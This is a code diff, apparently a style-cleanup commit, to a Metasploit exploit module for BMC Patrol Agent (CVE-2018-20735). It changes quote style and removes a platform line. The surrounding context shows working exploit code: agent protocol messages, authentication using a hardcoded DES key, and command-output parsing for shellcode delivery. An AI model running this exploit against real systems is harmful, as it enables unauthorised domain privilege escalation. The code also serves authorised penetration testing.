@@ -162,7 +162,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2018-20735'],
           ['URL', 'https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/']
         ],
-        'Platform' => ['win', 'linux'],
         'Targets' => [
           [
             'Windows Powershell Injected Shellcode', {
@@ -202,7 +201,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def cleanup
     disconnect
-    print_status("Disconnected from BMC Patrol Agent.")
+    print_status('Disconnected from BMC Patrol Agent.')
     @inflater.close
     @deflater.close
     super
@@ -210,16 +209,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def get_target_os(srv_info_msg)
     lines = srv_info_msg.split("\n")
-    fail_with(Failure::UnexpectedReply, "Invalid server info msg.") if lines[0] != "MS" && lines[1] != "{" && lines[-1] != "}"
+    fail_with(Failure::UnexpectedReply, 'Invalid server info msg.') if lines[0] != 'MS' && lines[1] != '{' && lines[-1] != '}'
 
     os = nil
     ver = nil
     lines[2..-2].each do |i|
-      val = i.split("=")
+      val = i.split('=')
       if val.length == 2
-        if val[0].strip! == "T"
+        if val[0].strip! == 'T'
           os = val[1]
-        elsif val[0].strip! == "VER"
+        elsif val[0].strip! == 'VER'
           ver = val[1]
         end
       end
@@ -229,11 +228,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def get_cmd_output(cmd_output_msg)
     lines = cmd_output_msg.split("\n")
-    fail_with(Failure::UnexpectedReply, "Invalid command output msg.") if lines[0] != "PEM_MSG" && lines[1] != "{" && lines[-1] != "}"
+    fail_with(Failure::UnexpectedReply, 'Invalid command output msg.') if lines[0] != 'PEM_MSG' && lines[1] != '{' && lines[-1] != '}'
 
     # Parse out command results
     idx_start = cmd_output_msg.index("Result\x00")
-    idx_end = cmd_output_msg.index("RemPsl_user")
+    idx_end = cmd_output_msg.index('RemPsl_user')
     output = cmd_output_msg[idx_start + 7..idx_end - 1]
 
     output
@@ -265,30 +264,30 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Connect to the BMC Patrol Agent
     connect
-    print_status("Connected to BMC Patrol Agent.")
+    print_status('Connected to BMC Patrol Agent.')
 
     # Create session msg
     create_session
     ret_data = receive_msg
-    fail_with(Failure::UnexpectedReply, "Failed to receive session confirmation. Aborting.") if ret_data.nil?
+    fail_with(Failure::UnexpectedReply, 'Failed to receive session confirmation. Aborting.') if ret_data.nil?
 
     # Authenticate
     authenticate_user(datastore['USER'], datastore['PASSWORD'])
 
     # Receive the authentication response
     ret_data = receive_msg
-    fail_with(Failure::UnexpectedReply, "Failed to receive authentication response. Aborting.") if ret_data.nil?
+    fail_with(Failure::UnexpectedReply, 'Failed to receive authentication response. Aborting.') if ret_data.nil?
 
     ret_msg = process_response(ret_data)
     if ret_msg =~ /logged in/
-      print_status("Successfully authenticated user.")
+      print_status('Successfully authenticated user.')
     else
-      fail_with(Failure::UnexpectedReply, "Login failed. Aborting.")
+      fail_with(Failure::UnexpectedReply, 'Login failed. Aborting.')
     end
 
     # Receive the server info
     ret_data = receive_msg
-    fail_with(Failure::UnexpectedReply, "Failed to receive server info msg. Aborting.") if ret_data.nil?
+    fail_with(Failure::UnexpectedReply, 'Failed to receive server info msg. Aborting.') if ret_data.nil?
     srv_info = process_response(ret_data)
 
     # Get the target's OS from their info msg
@@ -339,7 +338,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     payload_size_arr = header[0, 4]
-    payload_size = payload_size_arr.unpack1("N")
+    payload_size = payload_size_arr.unpack1('N')
     payload = ''
     if payload_size > 0
       payload = sock.get_once(payload_size)
@@ -372,14 +371,14 @@ class MetasploitModule < Msf::Exploit::Remote
     # While style checks complain, I intend to leave this parsing
     # in place for debugging purposes
     ret_size_arr = ret_data[0, 4]
-    ret_size = ret_size_arr.unpack1("N") # rubocop:disable Lint/UselessAssignment
+    ret_size = ret_size_arr.unpack1('N') # rubocop:disable Lint/UselessAssignment
 
     msg_type = ret_data[4, 1] # rubocop:disable Lint/UselessAssignment
     comp_flag = ret_data[5, 1]
 
     payload_data = ret_data[6..-1]
     if comp_flag == "\x00"
-      bin_data = payload_data.unpack1("H*") # rubocop:disable Lint/UselessAssignment
+      bin_data = payload_data.unpack1('H*') # rubocop:disable Lint/UselessAssignment
       payload_data = @inflater.inflate(payload_data)
     end
 
@@ -408,8 +407,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def identify(user)
     inner_len = 15
     msg_type = 8
-    len_str = [inner_len].pack("N")
-    msg_str = [msg_type].pack("N")
+    len_str = [inner_len].pack('N')
+    msg_str = [msg_type].pack('N')
     msg_1 = %(PEM_MSG
 {
 \tNSDL=#{inner_len}
@@ -418,7 +417,7 @@ class MetasploitModule < Msf::Exploit::Remote
 )
     msg_1 += "\x00"
     print_status("Msg: #{msg_1}")
-    bin_data = msg_1.unpack1("H*") # rubocop:disable Lint/UselessAssignment
+    bin_data = msg_1.unpack1('H*') # rubocop:disable Lint/UselessAssignment
     # Compress the message
     comp_data = @deflater.deflate msg_1, Zlib::SYNC_FLUSH
     send_msg(0x44, 0x0, comp_data)
@@ -435,7 +434,7 @@ class MetasploitModule < Msf::Exploit::Remote
     enc_key = 'k$C4}@"_'
     output_data = des_crypt_func(password, enc_key, DES_ENCRYPT)
     # Convert to hex string
-    encrpted_pw = output_data.unpack1("H*")
+    encrpted_pw = output_data.unpack1('H*')
     des_pw = encrpted_pw.upcase
 
     msg_1 = %(ID
@@ -459,7 +458,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def rotate_block_init(input_block_tuple)
     v6 = 0
     v5 = 0
-    input_block_tuple = input_block_tuple.pack("V*").unpack("i*")
+    input_block_tuple = input_block_tuple.pack('V*').unpack('i*')
     v3 = input_block_tuple[0]
     v4 = input_block_tuple[1]
 
@@ -666,7 +665,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def rotate_block_final(input_block_tuple)
     v6 = 0
     v5 = 0
-    input_block_tuple = input_block_tuple.pack("V*").unpack("i*")
+    input_block_tuple = input_block_tuple.pack('V*').unpack('i*')
     v3 = input_block_tuple[0]
     v4 = input_block_tuple[1]
 
@@ -893,19 +892,19 @@ class MetasploitModule < Msf::Exploit::Remote
     v3 >>= 4
     a2[0] |= v3 & 0xff
 
-    data_block = a2.pack("c*").unpack("V*")
+    data_block = a2.pack('c*').unpack('V*')
     data_block[0] &= 0x3F3F3F3F
     data_block[1] &= 0x3F3F3F3F
     data_block
   end
 
   def desx(data_block, ksch, idx)
-    ksch = ksch.pack("V*")
-    ksch = ksch.unpack("Q<*")
+    ksch = ksch.pack('V*')
+    ksch = ksch.unpack('Q<*')
     key_block = ksch[idx]
 
-    data_block_ptr = data_block.pack("V*")
-    data_block_ptr = data_block_ptr.unpack1("Q<*")
+    data_block_ptr = data_block.pack('V*')
+    data_block_ptr = data_block_ptr.unpack1('Q<*')
     data_block_ptr ^= key_block
 
     counter = 1
@@ -949,7 +948,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def store(data_block)
-    a1 = data_block.pack("V*")
+    a1 = data_block.pack('V*')
     val = 8 * (16 * (16 * (16 * (16 * (16 * (16 * a1[7].ord | a1[6].ord) | a1[5].ord) | a1[4].ord) | a1[3].ord) | a1[2].ord) | a1[1].ord) | a1[0].ord >> 1
     val & 0xffffffff
   end
@@ -990,7 +989,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def gen_key_unchecked(key)
     idx = 0
-    key_arr = key.unpack("V*")
+    key_arr = key.unpack('V*')
     key_sch = Array.new
     for i in 0..15
       idx += ROTATIONS[i].ord
@@ -1041,7 +1040,7 @@ class MetasploitModule < Msf::Exploit::Remote
     temp_key1 = Array.new(8, 0)
     temp_key2 = Array.new(8, 0)
 
-    key_buf_bytes = key_buf_str.unpack("c*")
+    key_buf_bytes = key_buf_str.unpack('c*')
 
     counter = 0
     key_buf_str_len = key_buf_bytes.length - 1
@@ -1050,13 +1049,13 @@ class MetasploitModule < Msf::Exploit::Remote
       temp_key1[counter] |= key_buf_bytes[i]
       temp_key2[counter] |= key_buf_bytes[i]
 
-      data_block = temp_key1.pack("c*").unpack("V*")
+      data_block = temp_key1.pack('c*').unpack('V*')
       temp_key1 = sbox_xors(data_block, des_keysch_0, 0)
-      temp_key1 = temp_key1.pack("V*").unpack("c*")
+      temp_key1 = temp_key1.pack('V*').unpack('c*')
 
-      data_block = temp_key2.pack("c*").unpack("V*")
+      data_block = temp_key2.pack('c*').unpack('V*')
       temp_key2 = sbox_xors(data_block, des_keysch_1, 0)
-      temp_key2 = temp_key2.pack("V*").unpack("c*")
+      temp_key2 = temp_key2.pack('V*').unpack('c*')
       counter += 1
     end
 
@@ -1065,12 +1064,12 @@ class MetasploitModule < Msf::Exploit::Remote
     for j in 0..7
       ret_key[j] = temp_key2[j] ^ temp_key1[j]
     end
-    ret_key.pack("c*")
+    ret_key.pack('c*')
   end
 
   def des_cbc(input_buf, key_sch, iv, decrypt_flag)
     output_block_arr = Array.new
-    blocks = input_buf.unpack("Q<*")
+    blocks = input_buf.unpack('Q<*')
     for i in 0..blocks.length - 1
 
       current_block = blocks[i]
@@ -1080,9 +1079,9 @@ class MetasploitModule < Msf::Exploit::Remote
         current_block ^= iv
       end
 
-      current_block_tuple = [current_block].pack("Q<").unpack("V*")
+      current_block_tuple = [current_block].pack('Q<').unpack('V*')
       output_block_tuple = sbox_xors(current_block_tuple, key_sch, decrypt_flag)
-      output_block = output_block_tuple.pack("V*").unpack1("Q<")
+      output_block = output_block_tuple.pack('V*').unpack1('Q<')
       output_block_arr.push output_block
 
       if decrypt_flag == 1
@@ -1093,7 +1092,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
 
-    output_block_arr.pack("Q<*")
+    output_block_arr.pack('Q<*')
   end
 
   def des_crypt_func(binary_buf, key_buf, decrypt_flag)
